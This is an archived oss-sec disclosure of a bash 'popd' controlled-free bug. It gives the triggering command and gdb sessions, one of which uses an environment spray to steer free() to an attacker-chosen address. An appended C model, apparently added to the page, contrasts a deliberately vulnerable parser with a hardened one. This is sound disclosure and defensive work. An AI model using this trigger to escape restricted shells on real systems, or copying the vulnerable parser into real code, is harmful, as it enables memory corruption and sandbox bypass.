oss-sec mailing list archives
bash - popd controlled free
From: Fernando Muñoz <fernando () null-life com>
Date: Thu, 17 Nov 2016 12:04:49 -0500
bash - popd controlled free
====================

popd can be tricked to free a user-supplied address in the following way:

$ popd +-111111

This could be used to bypass restricted shells (rsh) in some environments to cause a use-after-free.

This was already reported to the bash devs and only considered a bug; if MITRE considers it could have a security impact, please assign a CVE.

Details
======

$ gdb bash
...
(gdb) r -c 'popd +-67372036'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036'

Program received signal SIGSEGV, Segmentation fault.
0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384
384               free (pushd_directory_list[i]);
(gdb) print pushd_directory_list[i]
Cannot access memory at address 0x10101010

----

$ export AA=`perl -e 'print "A"x100000'`
$ gdb ./bash
...
(gdb) x/s *((char **)environ+13)
0xbffe75d4:     "AA=", 'A' <repeats 197 times>...
(gdb) run -c 'popd +-805281142'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142'

Program received signal SIGSEGV, Segmentation fault.
internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384, flags=<optimized out>) at malloc.c:863
863       if (p->mh_alloc == ISMEMALIGN)

- Fernando
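The crash above comes from a stack index that is never checked for being negative: the leading "+" or "-" of the argument is consumed as the direction, and the remainder ("-111111") is still accepted as a signed number, so free() is handed whatever pointer lives at pushd_directory_list[-111111]. The following C model is an added example written for this archive page; it is not bash's pushd.def and the parse sequence it assumes (strip one direction character, then strtol the rest, then bounds-check only the upper end) is an assumption about the bug class, not a quotation of the real code. It contrasts that vulnerable index computation with a hardened one that rejects a second sign and any out-of-range index before anything is freed. The directory stack contents are constructed sample data.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>

/* Toy directory stack standing in for pushd_directory_list (constructed data). */
#define STACK_MAX 8
static char *dirstack[STACK_MAX];
static int dirstack_len;

static char *xstrdup(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p) memcpy(p, s, n);
    return p;
}

/* Reset the stack to three constructed entries: index 0 is the top ("+0"). */
void stack_reset(void)
{
    for (int i = 0; i < dirstack_len; i++) free(dirstack[i]);
    dirstack_len = 0;
    dirstack[dirstack_len++] = xstrdup("/home/user");
    dirstack[dirstack_len++] = xstrdup("/tmp");
    dirstack[dirstack_len++] = xstrdup("/var/log");
}

/* VULNERABLE (assumed model of the bug): the direction sign is stripped,
 * the rest is parsed as a signed number, and only the upper bound is checked.
 * "+-111111" therefore yields -111111, which the caller would use as an
 * array index and pass straight to free(). */
long popd_index_vuln(const char *arg, int depth)
{
    char direction = '+';
    char *end;
    if (*arg == '+' || *arg == '-') direction = *arg++;
    long n = strtol(arg, &end, 10);           /* happily accepts "-111111" */
    if (end == arg || *end != '\0') return -1; /* not a number at all */
    if (n >= depth) return -1;                 /* upper bound only: n < 0 passes */
    return direction == '+' ? n : depth - 1 - n;
}

/* HARDENED: the remainder must start with a digit (so a second sign is
 * rejected outright), overflow is caught, and the final index is checked
 * on both ends before it can reach free(). Returns -1 on any rejection. */
long popd_index_safe(const char *arg, int depth)
{
    char direction = '+';
    char *end;
    long n, idx;
    if (*arg == '+' || *arg == '-') direction = *arg++;
    if (!isdigit((unsigned char)*arg)) return -1;  /* rejects "+-N", "", "+ 3" */
    errno = 0;
    n = strtol(arg, &end, 10);
    if (errno == ERANGE || *end != '\0') return -1;
    idx = direction == '+' ? n : depth - 1 - n;
    if (n < 0 || idx < 0 || idx >= depth) return -1; /* both bounds, both directions */
    return idx;
}

/* popd using the hardened index: frees and removes the entry, or refuses.
 * Returns 1 if an entry was removed, 0 if the argument was rejected. */
int popd_remove(const char *arg)
{
    long i = popd_index_safe(arg, dirstack_len);
    if (i < 0) return 0;
    free(dirstack[i]);
    memmove(&dirstack[i], &dirstack[i + 1],
            (size_t)(dirstack_len - 1 - i) * sizeof dirstack[0]);
    dirstack_len--;
    return 1;
}

int main(void)
{
    const char *args[] = { "+1", "-0", "+-111111", "--5", "+99" };
    stack_reset();
    for (size_t k = 0; k < sizeof args / sizeof args[0]; k++)
        printf("%-10s vuln=%ld safe=%ld\n", args[k],
               popd_index_vuln(args[k], dirstack_len),
               popd_index_safe(args[k], dirstack_len));
    printf("popd +-111111 accepted: %d\n", popd_remove("+-111111"));
    printf("popd +1 accepted: %d, entries left: %d\n", popd_remove("+1"), dirstack_len);
    return 0;
}
```

The vulnerable function returns a wildly negative index for "+-111111" exactly as the gdb sessions above suggest, while the hardened parser rejects it at the first non-digit. The second guard (n < 0 together with idx bounds) is kept even though isdigit already excludes a sign, so that a later change to the parser cannot silently reopen the hole.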
Current thread:
- bash - popd controlled free Fernando Muñoz (Nov 17)
- Re: bash - popd controlled free cve-assign (Nov 17)